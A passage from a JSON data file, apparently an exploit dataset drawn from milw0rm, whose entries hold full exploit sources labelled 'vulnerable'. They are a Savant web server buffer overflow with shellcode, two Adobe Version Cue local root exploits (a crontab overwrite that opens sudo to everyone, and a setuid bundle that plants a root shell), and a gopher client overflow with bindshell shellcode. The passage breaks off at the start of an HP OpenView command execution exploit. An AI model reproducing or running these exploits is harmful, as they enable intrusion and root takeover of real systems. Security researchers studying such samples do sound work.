hp = gethostbyname(host);\n\n        if(!hp) {\n\n            printf(\"\\nError: Unable to resolve hostname (%s)\\n\", host);\n\n            exit(1);\n\n        } else host_ip = *(u_int *)(hp->h_addr);\n\n    }\n\n    return(host_ip);\n\n}\n\n\n\n\n\n\n\n#ifndef WIN32\n\n    void std_err(void) {\n\n        perror(\"\\nError\");\n\n        exit(1);\n\n    }\n\n#endif\n\n\n\n// milw0rm.com [2005-08-29]",
960        "vulnerable": true
961    },
962    {
963        "exploit_id": 1184,
964        "content": "#!/usr/local/bin/perl\n\n#\n\n#   Savant Buffer Overflow Exploit\n\n# ----------------------------------\n\n# Infam0us Gr0up - Securiti Research\n\n#\n\n#\n\n# Tested on Windows2000 SP4 (Win NT)\n\n# Info: infamous.2hell.com\n\n# Vendor URL: http://savant.sourceforge.net\n\n#\n\n\n\n\n\n$ARGC=@ARGV;\n\nif ($ARGC !=3) {\n\n    print \"\\nUsage: $0 [remote IP] [Port]\\n\";\n\n    print \"Example: $0 127.0.0.1 80 1\\n\";\n\n    print \"\\nsystem:\\n\";\n\n    print \" 1 - Windows 2000 SP4\\n\";\n\n    print \" 2 - winXP sp1\\n\";\n\n    print \"\\n\";\n\n    exit;\n\n}\n\nuse Socket;\n\n\n\n$x90 = \"\\x90\"x13;\n\n$pack_ret = pack('l', ($ret));\n\n\n\nif($sistem==1){$ret = 0x77e14c29;} # Windows 2000 SP4\n\nif($sistem==2){$ret = 0x77fb59cc;} # winXP sp1\n\n\n\nmy($remote,$port,$iaddr,$paddr,$proto);\n\n$remote=$ARGV[0];\n\n$port =$ARGV[1];\n\n$sistem = $ARGV[2];\n\nprint \"\\n\";\n\nprint \"[+] Connect to $remote..\\n\";\n\n$iaddr = inet_aton($remote) or die \"[-] Error: $!\";\n\n$paddr = sockaddr_in($port, $iaddr) or die \"[-] Error: $!\";\n\n$proto = getprotobyname('tcp') or die \"[-] Error: $!\";\n\n\n\nsocket(SOCK, PF_INET, SOCK_STREAM, $proto) or die \"[-] Error: $!\";\n\nconnect(SOCK, $paddr) or die \"[-] Error: $!\";\n\n\n\nprint \"[+] Connected\\n\";\n\nprint \"[+] Build shellcode..\\n\";\n\n\n\nmy $shellcode =\n\n\"\\x2b\\xc9\\x83\\xe9\\xb8\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x94\".\n\n\"\\xd3\\x48\\xef\\x83\\xeb\\xfc\\xe2\\xf4\\x68\\xb9\\xa3\\xa2\\x7c\\x2a\\xb7\\x10\".\n\n\"\\x6b\\xb3\\xc3\\x83\\xb0\\xf7\\xc3\\xaa\\xa8\\x58\\x34\\xea\\xec\\xd2\\xa7\\x64\".\n\n\"\\xdb\\xcb\\xc3\\xb0\\xb4\\xd2\\xa3\\xa6\\x1f\\xe7\\xc3\\xee\\x7a\\xe2\\x88\\x76\".\n\n\"\\x38\\x57\\x88\\x9b\\x93\\x12\\x82\\xe2\\x95\\x11\\xa3\\x1b\\xaf\\x87\\x6c\\xc7\".\n\n\"\\xe1\\x36\\xc3\\xb0\\xb0\\xd2\\xa3\\x89\\x1f\\xdf\\x03\\x64\\xcb\\xcf\\x49\\x04\".\n\n\"\\x97\\xff\\xc3\\x66\\xf8\\xf7\\x54\\x8e\\x57\\xe2\\x93\\x8b\\x1f\\x90\\x78\\x64\".\n\n\"\\xd4\\xdf\\xc3\\x9f\\x88\\x7e\\xc3\\xaf\\x9c\\x8d\\x20\\x61\\xda\\xdd\\xa4\\xbf\".\n\n\"\\x6b\\x05\\x2e\\xbc\\xf2\\xbb\\x7b\\xdd\\xfc\\xa4\\x3b\\xdd\\xcb\\x87\\xb7\\x3f\".\n\n\"\\xfc\\x18\\xa5\\x13\\xaf\\x83\\xb7\\x39\\xcb\\x5a\\xad\\x89\\x15\\x3e\\x40\\xed\".\n\n\"\\xc1\\xb9\\x4a\\x10\\x44\\xbb\\x91\\xe6\\x61\\x7e\\x1f\\x10\\x42\\x80\\x1b\\xbc\".\n\n\"\\xc7\\x90\\x1b\\xac\\xc7\\x2c\\x98\\x87\\xeb\\xd3\\x48\\xee\\xf2\\xbb\\x4f\\x53\".\n\n\"\\xf2\\x80\\xc1\\x0e\\x01\\xbb\\xa4\\x16\\x3e\\xb3\\x1f\\x10\\x42\\xb9\\x58\\xbe\".\n\n\"\\xc1\\x2c\\x98\\x89\\xfe\\xb7\\x2e\\x87\\xf7\\xbe\\x22\\xbf\\xcd\\xfa\\x84\\x66\".\n\n\"\\x73\\xb9\\x0c\\x66\\x76\\xe2\\x88\\x1c\\x3e\\x46\\xc1\\x12\\x6a\\x91\\x65\\x11\";\n\n\n\n# If Savant can serve HTTP requests with a server socket to receive the requests,\n\n# the Savant server will keep online when this error occurs.\n\n# Most often, this can by try to simultaneously run two web servers.\n\n# Also this could Allows attacker to bind a port\n\n\n\n$sploit =\n\n\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\".\n\n\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\".\n\n\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\".\n\n\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\".\n\n\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\".\n\n\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\".\n\n\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\".\n\n\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\".\n\n\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\".\n\n\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\".\n\n\"\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\".\n\n\"\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\".\n\n\"\\x55\\xff\\xd0\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\".\n\n\"\\xd0\\x93\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\".\n\n\"\\x66\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\".\n\n\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\\xab\".\n\n\"\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\\x52\\x51\".\n\n\"\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\".\n\n\"\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\\xc4\\x64\\xff\\xd6\".\n\n\"\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\\xff\\xd0\";\n\n\n\n$all = $x90.$shellcode;\n\n$get = \"GET /$x90.$shellcode.$sp4 \\r\\n\\n\";\n\n$shell = $pack_ret.$sploit.$x90;\n\nprint \"[+] Sending overflOw..\\n\";\n\nsend(SOCK, $get, 0) or die \"[-] Failed query: $!\";\n\nsleep(1);\n\nprint \"[+] Server Overflow!\\n\";\n\nprint \"[+] Send SplOit..\\n\";\n\nsend(SOCK, $shell, 0) or die \"[-] Failed query: $!\";\n\nsleep(1);\n\nprint \"[+] Granted!\\n\";\n\nclose(SOCK);\n\nprint \"[~] Trying connect $remote port 4444\\n\";\n\n$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => \"4444\", Photo => tcp)\n\n|| die \"[-] FAILED ...\\n\";\n\nclose($socket);\n\nprint \"[+] PWNED rulz port 4444 ...\\n\";\n\nexit;\n\n\n\n// milw0rm.com [2005-08-30]",
965        "vulnerable": true
966    },
967    {
968        "exploit_id": 1185,
969        "content": "#!/usr/bin/perl\n\n#\n\n# Adobe Version Cue VCNative[OSX]: local root exploit.\n\n# \n\n# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n# \n\n# Adobe Version Cue's VCNative program writes data to a log file in\n\n# the current working directory while running as (setuid) root. the\n\n# logfile is formated as <cwd>/VCNative-<pid>.log, which is easily\n\n# predictable. you may link this file to any file on the system\n\n# and overwrite its contents. use of the \"-host\" option (with\n\n# \"-port\") will allow user-supplied data to be injected into the\n\n# file.\n\n#\n\n# This exploit works by overwriting /etc/crontab with\n\n# '* * * * * root echo \"ALL ALL=(ALL) ALL\">/etc/sudoers' and\n\n# log garbage. within a short period of time crontab will overwrite\n\n# /etc/sudoers and \"sudo sh\" to root is possible. this method is used\n\n# because direct overwriting of /etc/sudoers will cause sudo to exit\n\n# with configuration errors due to the log garbage, whereas crontab\n\n# will ignore it. (this exploit requires both cron to be running and\n\n# sudo to exist--this is generally default osx)\n\n\n\nuse POSIX;\n\n\n\n$vcn_path=\"/Applications/Adobe Version Cue/tomcat/webapps/ROOT/\" .\n\n\"WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative\";\n\n$vcn_pid=($$ + 1);\n\n$vcn_cwd=\"/tmp\";\n\n$vcn_tempfile=\"$vcn_cwd/VCNative-$vcn_pid\\.log\";\n\n$ovrfile=\"/etc/crontab\";\n\n$ovrstr=\"* * * * * root echo \\\\\\\"ALL ALL=(ALL) ALL\\\\\\\">/etc/sudoers\";\n\n\n\nsub pexit{print(\"[!] @_.\\n\");exit(1);}\n\nprint(\"[*] Adobe Version Cue VCNative[OSX]: local root exploit.\\n\");\n\nprint(\"[*] by: vade79/v9 v9\\@fakehalo.us (fakehalo/realhalo)\\n\\n\");\n\nif(!-f $vcn_path){\n\npexit(\"VCNative binary doesn't appear to exist\");\n\n}\n\nif(!-f\"/etc/crontab\"||!-f\"/etc/sudoers\"){\n\npexit(\"/etc/crontab and /etc/sudoers are required for this to work\");\n\n}\n\nprint(\"[*] sym-linking $ovrfile -> $vcn_tempfile.\\n\");\n\nsymlink($ovrfile,$vcn_tempfile)||pexit(\"couldn't link files.\");\n\n@ast=stat($ovrfile);\n\nprint(\"[*] running VCNative...\\n\");\n\nsystem(\"\\\"$vcn_path\\\" -cwd $vcn_cwd -port 1 -host \\\"\\n\\n$ovrstr\\n\\n\\\"\");\n\nprint(\"[*] removing $vcn_tempfile...\\n\");\n\nunlink($vcn_tempfile);\n\n@st=stat($ovrfile);\n\nif($st[7]==$ast[7]&&$st[9]==$ast[9]){\n\npexit(\"$ovrfile was not modified, exploit failed\");\n\n}\n\nelse{\n\nprint(\"[*] $ovrfile was overwritten successfully...\\n\");\n\n}\n\nprint(\"[*] waiting for crontab to change /etc/sudoers...\\n\");\n\n@ast=@st=stat(\"/etc/sudoers\");\n\nwhile($st[7]==$ast[7]&&$st[9]==$ast[9]){\n\nsleep(1);\n\n@ast=stat(\"/etc/sudoers\");\n\n}\n\nprint(\"[*] /etc/sudoers has been modified.\\n\");\n\nprint(\"[*] attempting to \\\"sudo sh\\\". (use YOUR password)\\n\");\n\nsystem(\"sudo sh\");\n\nexit(0);\n\n\n\n# milw0rm.com [2005-08-30]",
970        "vulnerable": true
971    },
972    {
973        "exploit_id": 1186,
974        "content": "/*[ Adobe Version Cue VCNative[OSX]: local root exploit. (dyld) ]\n\n* \n\n* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) \n\n* \n\n* Adobe Version Cue's VCNative program allows un-privileged \n\n* local users to load arbitrary libraries(\"bundles\") while \n\n* running setuid root. this is done via the \"-lib\" \n\n* command-line option. \n\n* \n\n* note: VCNative must connect to a valid host to be able \n\n* to get to the point where the library is loaded. this is \n\n* automated in this exploit by listening to an arbitrary local \n\n* port and using the localhost(\"127.0.0.1\") to connect to. \n\n*****************************************************************/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <strings.h>\n\n#include <signal.h>\n\n#include <unistd.h>\n\n#include <netdb.h>\n\n#include <sys/stat.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <sys/time.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n\n\n#define VCNATIVE_PATH \"/Applications/Adobe Version Cue/tomcat/webapps\"\\\n\n\"/ROOT/WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative\"\n\n#define VCNATIVE_PORT 7979\n\n#define CC_PATH \"/usr/bin/gcc\"\n\n#define BUNDLE_PATH \"/tmp/xvcn_lib\"\n\n#define SUSH_PATH \"/tmp/xvcn_sush\"\n\n\n\nvoid printe(char *,signed char);\n\n\n\nint main(){\n\nsigned int sock=0,so=1;\n\nchar syscmd[4096+1];\n\nstruct stat mod;\n\nstruct sockaddr_in sa;\n\nFILE *bundle,*sush;\n\n/* banner. */\n\nprintf(\"[*] Adobe Version Cue VCNative[OSX]: local root exploit. (dy\"\n\n\"ld)\\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\\n\\n\");\n\n/* see if we have what we need. */\n\nif(access(CC_PATH,X_OK))\n\nprinte(\"incorrect gcc/cc path. (CC_PATH)\",1);\n\nif(stat(VCNATIVE_PATH,&mod))\n\nprinte(\"incorrect VCNative path. (VCNATIVE_PATH)\",1);\n\nif(!(S_ISUID&mod.st_mode))\n\nprinte(\"VCNative is not setuid. (VCNATIVE_PATH)\",1);\n\n/* appease VCNative's initial connection to load the library. */\n\nsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\n\nsetsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));\n\n#ifdef SO_REUSEPORT\n\nsetsockopt(sock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));\n\n#endif\n\nsa.sin_family=AF_INET;\n\nsa.sin_port=htons(VCNATIVE_PORT);\n\nsa.sin_addr.s_addr=INADDR_ANY;\n\nprintf(\"[*] opening local port: %u.\\n\",VCNATIVE_PORT);\n\nif(bind(sock,(struct sockaddr *)&sa,sizeof(sa))==-1)\n\nprinte(\"could not bind socket.\",1);\n\nlisten(sock,1); \n\n/* make the bogus library/bundle. */\n\nif(!(bundle=fopen(BUNDLE_PATH \".c\",\"w\")))\n\nprinte(\"could not write to bundle source file.\",1);\n\nfprintf(bundle,\"void VCLibraryInit(){\\n\");\n\nfprintf(bundle,\" seteuid(0);\\n\");\n\nfprintf(bundle,\" setuid(0);\\n\");\n\nfprintf(bundle,\" setegid(0);\\n\");\n\nfprintf(bundle,\" setgid(0);\\n\");\n\nfprintf(bundle,\" chown(\\\"\" SUSH_PATH \"\\\",0,0);\\n\");\n\nfprintf(bundle,\" chmod(\\\"\" SUSH_PATH \"\\\",3145);\\n\");\n\nfprintf(bundle,\"}\\n\");\n\nfprintf(bundle,\"void VCLibraryExec(){}\\n\");\n\nfprintf(bundle,\"void VCLibraryExit(){}\\n\");\n\nfclose(bundle);\n\n/* make the (to-be) rootshell. */\n\nif(!(sush=fopen(SUSH_PATH \".c\",\"w\")))\n\nprinte(\"could not write to sush/rootshell source file.\",1);\n\nfprintf(sush,\"int main(){\\n\");\n\nfprintf(sush,\" seteuid(0);\\n\");\n\nfprintf(sush,\" setuid(0);\\n\");\n\nfprintf(sush,\" setegid(0);\\n\");\n\nfprintf(sush,\" setgid(0);\\n\");\n\nfprintf(sush,\" execl(\\\"/bin/sh\\\",\\\"sh\\\",0);\\n\");\n\nfprintf(sush,\"}\\n\");\n\nfclose(sush);\n\n/* compile the bogus library/bundle. */\n\nsnprintf(syscmd,4096,\"%s %s.c -bundle -o %s.bundle\",CC_PATH,\n\nBUNDLE_PATH,BUNDLE_PATH);\n\nprintf(\"[*] system: %s\\n\",syscmd);\n\nsystem(syscmd);\n\n/* compile the (to-be) rootshell. */\n\nsnprintf(syscmd,4096,\"%s %s.c -o %s\",CC_PATH,\n\nSUSH_PATH,SUSH_PATH);\n\nprintf(\"[*] system: %s\\n\",syscmd);\n\nsystem(syscmd);\n\n/* run VCNative. (\".bundle\" is appended to the library path) */\n\nsnprintf(syscmd,4096,\"\\\"%s\\\" -host 127.0.0.1 -port %u -lib %s\",\n\nVCNATIVE_PATH,VCNATIVE_PORT,BUNDLE_PATH);\n\nprintf(\"[*] system: %s\\n\",syscmd);\n\nsystem(syscmd);\n\n/* clean-up. */\n\nunlink(BUNDLE_PATH \".c\");\n\nunlink(BUNDLE_PATH \".bundle\");\n\nunlink(SUSH_PATH \".c\");\n\nshutdown(sock,2);\n\nclose(sock);\n\n/* check for success. */\n\nif(stat(SUSH_PATH,&mod))\n\nprinte(\"sush/rootshell vanished? (SUSH_PATH)\",1);\n\nif(!(S_ISUID&mod.st_mode)||mod.st_uid){\n\nunlink(SUSH_PATH);\n\nprinte(\"sush/rootshell is not setuid root, exploit failed.\",1);\n\n}\n\n/* success. */\n\nprintf(\"[*] attempting to execute rootshell... (\" SUSH_PATH \")\\n\\n\");\n\nsystem(SUSH_PATH);\n\nexit(0);\n\n}\n\n/* all-purpose error/exit function. */\n\nvoid printe(char *err,signed char e){\n\nprintf(\"[!] %s\\n\",err);\n\nif(e)exit(e);\n\nreturn;\n\n}\n\n\n\n// milw0rm.com [2005-08-30]",
975        "vulnerable": true
976    },
977    {
978        "exploit_id": 1187,
979        "content": "/*[ gopher[v3.0.9+]: remote (client) buffer overflow exploit. ]\n\n* \n\n* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n* \n\n* compile: \n\n* gcc xgopher-client.c -o xgopher-client \n\n* \n\n* syntax: \n\n* ./xgopher-client <port> [bindshell port] \n\n* \n\n* The Internet Gopher Client is based on the UMN \n\n* Gopher/Gopherd 2.3.1 code. Gopher is an Internet technology \n\n* that predates the Web. It presents information as a virtual \n\n* network-wide filesystem. Modern browsers such as Konqueror \n\n* can display gopherspace as if it contained files on your \n\n* local machine (trees, drag and drop, etc.), but the \n\n* difference is that each file or folder in that tree may be \n\n* on a different machine. \n\n* \n\n* this client contains a remotely exploitable buffer overflow \n\n* in the processing of \"+VIEWS:\" information, located in \n\n* SRC/object/VIews.c in the VIfromLine() function. \n\n* \n\n* this is a stack overflow that can be exploited immediately \n\n* upon the client's connection to an untrusted gopher server. \n\n* while this is a stack overflow, exploitation of this \n\n* overflow is not completely standard, and special values \n\n* will be needed for it to work. (see the first three DEFINEs \n\n* below) \n\n* \n\n* i made this simply to be sure it was possible to exploit, \n\n* tested successfully on mandrake/9.2 with gopher/3.0.9 \n\n* compiled from source. \n\n***************************************************************/\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <strings.h>\n\n#include <signal.h>\n\n#include <unistd.h>\n\n#include <netdb.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <sys/time.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n\n\n/* THE FOLLOWING THREE DEFINES WILL BE UNIQUE TO EACH SYSTEM. */\n\n\n\n/* this needs to be replaced as a null-byte will overwrite it. this */\n\n/* can be found in gdb using a trial-run of the exploit. */\n\n/* (gdb) break VIfromLine */\n\n/* Breakpoint 1 at 0x805c2e5: file VIews.c, line 231. */\n\n/* (gdb) run server-running-this-exploit.com 70 */\n\n/* ... */\n\n/* Breakpoint 1, VIfromLine (vi=0x8074f08, ... */\n\n/* -----------------------------^^^^^^^^^ */\n\n/* ... */\n\n#define REPLACE_VI_ADDR 0x08074f08\n\n\n\n/* where the shellcode is located. you can use a trial-run to get */\n\n/* this as well, run \"objdump -s <core> | grep 90909090\" on the */\n\n/* core file, and choose something in the middle of all the */\n\n/* 0xbfff???? addresses dumped. */\n\n#define RET_ADDR 0xbfffe910\n\n\n\n/* guess time; try between 0-12, not likely to be anything */\n\n/* higher than that. */\n\n#define PLACEMENT_OFFSET 7\n\n\n\n/* FROM HERE ON THE DEFINES DO NOT NEED TO BE MODIFIED. */\n\n#define BUFSIZE 500\n\n#define DFL_BINDSHELL_PORT 7979\n\n#define TIMEOUT 10\n\n\n\nstatic char x86_exec[]= /* bindshell, from netric. */\n\n\"\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\\x50\\x89\\xe1\\xb0\\x66\"\n\n\"\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\xff\\xff\\x43\\x66\\x53\\x89\"\n\n\"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\"\n\n\"\\x44\\x24\\x04\\x43\\x43\\xb0\\x66\\xcd\\x80\\x83\\xc4\\x0c\\x52\"\n\n\"\\x52\\x43\\xb0\\x66\\xcd\\x80\\x93\\x89\\xd1\\xb0\\x3f\\xcd\\x80\"\n\n\"\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\n\n\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"\n\n\"\\x80\";\n\n\n\n/* prototypes. */\n\nunsigned char *getcode(void);\n\nchar *gopherd_bind(unsigned short);\n\nvoid getshell(char *,unsigned short);\n\nvoid printe(char *,short);\n\nvoid sig_alarm(){printe(\"alarm/timeout hit.\",1);}\n\n\n\n/* begin. */\n\nint main(int argc,char **argv){\n\nunsigned short port=0,sport=DFL_BINDSHELL_PORT;\n\nchar *hostptr;\n\nprintf(\"[*] gopher[v3.0.9+]: remote (client) buffer overflow exp\"\n\n\"loit.\\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\\n\\n\");\n\nif(argc<2){\n\nprintf(\"[!] syntax: %s <port> [bindshell port]\\n\",argv[0]);\n\nexit(1);\n\n}\n\nport=atoi(argv[1]);\n\nif(argc>2)sport=atoi(argv[2]);\n\n\n\n/* set the port to bind to in the shellcode. */\n\nx86_exec[20]=(sport&0xff00)>>8;\n\nx86_exec[21]=(sport&0x00ff);\n\n\n\n/* verbose values display. */\n\nprintf(\"[*] replacement \\\"vi\\\" address\\t\\t: 0x%.8x\\n\",REPLACE_VI_ADDR);\n\nprintf(\"[*] return address\\t\\t\\t: 0x%.8x\\n\",RET_ADDR);\n\nprintf(\"[*] offset from the end of tmpstr[]\\t: %d (=%d)\\n\",\n\nPLACEMENT_OFFSET,PLACEMENT_OFFSET*4);\n\nprintf(\"[*] server port\\t\\t\\t\\t: %u\\n\",port);\n\nprintf(\"[*] bindshell port\\t\\t\\t: %u\\n\\n\",sport);\n\n\n\n/* wait for a connection and send overflow. */\n\nhostptr=gopherd_bind(port);\n\n\n\n/* be safe, and give it time to run. */\n\nsleep(3);\n\n\n\n/* see if a shell spawned. */\n\ngetshell(hostptr,sport);\n\n\n\nexit(0);\n\n}\n\n/* this is what fills the buffer that will be overflown. (tmpstr[256]) */\n\nunsigned char *getcode(void){\n\nunsigned char *buf;\n\nif(!(buf=(unsigned char *)malloc(BUFSIZE+1)))\n\nprinte(\"getcode(): allocating memory failed.\",1);\n\n\n\n/* make everything nops, and overwrite where needed. */\n\nmemset(buf,0x90,BUFSIZE);\n\n\n\n/* this gives more NOP/guessing room. if it hits before the addresses, */\n\n/* it will jump over them to get to the shellcode. (jumps 8 bytes) */\n\nbuf[254+(PLACEMENT_OFFSET*4)]=0xeb; /* jump, */\n\nbuf[255+(PLACEMENT_OFFSET*4)]=0x08; /* 8. */\n\n\n\n/* return address. */\n\n*(long *)&buf[256+(PLACEMENT_OFFSET*4)]=RET_ADDR;\n\n\n\n/* the replacement value will be right after the new return address. */\n\n/* (this is needed because a null-byte will corrupt it, and fault */\n\n/* where not desired) */\n\n*(long *)&buf[260+(PLACEMENT_OFFSET*4)]=REPLACE_VI_ADDR;\n\n\n\n/* add shellcode to the end of the buffer. */\n\nmemcpy(buf+BUFSIZE-strlen(x86_exec),x86_exec,strlen(x86_exec));\n\nreturn(buf);\n\n}\n\nchar *gopherd_bind(unsigned short port){\n\nint ssock=0,sock=0,so=1;\n\nunsigned int salen=0;\n\nchar pseudobuf[2];\n\nstruct sockaddr_in ssa,sa;\n\nssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\n\nsetsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));\n\n#ifdef SO_REUSEPORT\n\nsetsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));\n\n#endif\n\nssa.sin_family=AF_INET;\n\nssa.sin_port=htons(port);\n\nssa.sin_addr.s_addr=INADDR_ANY;\n\nprintf(\"[*] awaiting connection from: *:%d.\\n\",port);\n\nif(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)\n\nprinte(\"could not bind socket.\",1);\n\nlisten(ssock,1); \n\nbzero((char*)&sa,sizeof(struct sockaddr_in));\n\nsalen=sizeof(sa);\n\nsock=accept(ssock,(struct sockaddr *)&sa,&salen);\n\nclose(ssock);\n\nprintf(\"[*] gopher server connection established.\\n\");\n\n\n\n/* not really needed, but i feel better with it waiting for it. */\n\nprintf(\"[*] waiting for <any> request/data...\\n\");\n\nread(sock,pseudobuf,1);\n\nprintf(\"[*] received request/data, sending overflow.\\n\");\n\n\n\n/* setup the precursor to cause the overflow. */\n\nwrite(sock,\"+-1\\n\",4);\n\nwrite(sock,\"+INFO:\\t0filler\\tfiller\\tfiller\\tfiller\\n\",36);\n\nwrite(sock,\"+VIEWS:\\t\\n \",10);\n\n\n\n/* the overflow. */\n\nwrite(sock,getcode(),BUFSIZE);\n\nwrite(sock,\"\\n\",1);\n\n\n\nsleep(1);\n\nclose(sock);\n\nprintf(\"[*] gopher server connection closed.\\n\");\n\nreturn(inet_ntoa(sa.sin_addr));\n\n}\n\nvoid getshell(char *hostname,unsigned short port){\n\nint sock,r;\n\nfd_set fds;\n\nchar buf[4096+1];\n\nstruct hostent *he;\n\nstruct sockaddr_in sa;\n\nprintf(\"[*] checking to see if the exploit was successful.\\n\");\n\nif((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)\n\nprinte(\"getshell(): socket() failed.\",1);\n\nsa.sin_family=AF_INET;\n\nif((sa.sin_addr.s_addr=inet_addr(hostname))){\n\nif(!(he=gethostbyname(hostname)))\n\nprinte(\"getshell(): couldn't resolve.\",1);\n\nmemcpy((char *)&sa.sin_addr,(char *)he->h_addr,\n\nsizeof(sa.sin_addr));\n\n}\n\nsa.sin_port=htons(port);\n\nsignal(SIGALRM,sig_alarm);\n\nalarm(TIMEOUT);\n\nprintf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);\n\nif(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){\n\nprintf(\"[!] connection failed: %s:%d.\\n\",hostname,port);\n\nreturn;\n\n}\n\nalarm(0);\n\nprintf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port);\n\nsignal(SIGINT,SIG_IGN);\n\nwrite(sock,\"uname -a;id\\n\",13);\n\nwhile(1){\n\nFD_ZERO(&fds);\n\nFD_SET(0,&fds);\n\nFD_SET(sock,&fds);\n\nif(select(sock+1,&fds,0,0,0)<1)\n\nprinte(\"getshell(): select() failed.\",1);\n\nif(FD_ISSET(0,&fds)){\n\nif((r=read(0,buf,4096))<1)\n\nprinte(\"getshell(): read() failed.\",1);\n\nif(write(sock,buf,r)!=r)\n\nprinte(\"getshell(): write() failed.\",1);\n\n}\n\nif(FD_ISSET(sock,&fds)){\n\nif((r=read(sock,buf,4096))<1)\n\nexit(0);\n\nwrite(1,buf,r);\n\n}\n\n}\n\nclose(sock);\n\nreturn;\n\n}\n\nvoid printe(char *err,short e){\n\nprintf(\"[!] %s\\n\",err);\n\nif(e)\n\nexit(1);\n\nreturn;\n\n}\n\n\n\n// milw0rm.com [2005-08-30]",
980        "vulnerable": true
981    },
982    {
983        "exploit_id": 1188,
984        "content": "/*\n\nWeb Browser info:\n\n\t/OvCgi/connectedNodes.ovpl?node=a|command|\n\n\t/str0ke\n\n*/\n\n\n\n/*\n\n##################################################################################\n\n# HP OpenView Network Node Manager 6.2, 6.4, 7.01, 7.50 Remote Command Execution #\n\n##################################################################################\n\n\n\nName: HP OV NNM Remote Command Execution Exploit\n\nFile: HP_OV_NNM_RCE.c\n\nDescription: Exploit\n\nAuthor: Lympex\n\nContact:\n\n+ Web: http://l-bytes.net\n\n+ Mail: lympex[at]gmail[dot]com\n\nDate: 30/08/2005\n\nExtra: Compiled with Visual C++ 6.0\n\n\n\n############################################################################\n\n#SecurityTracker Alert ID:  1014791                                        #\n\n#SecurityTracker URL:  http://securitytracker.com/id?1014791               #\n\n#CVE Reference:  GENERIC-MAP-NOMATCH                                       #\n\n#Updated:  Aug 25 2005                                                     #\n\n#Original Entry Date:  Aug 25 2005                                         #\n\n#Impact:  Execution of arbitrary code via network, User access via network 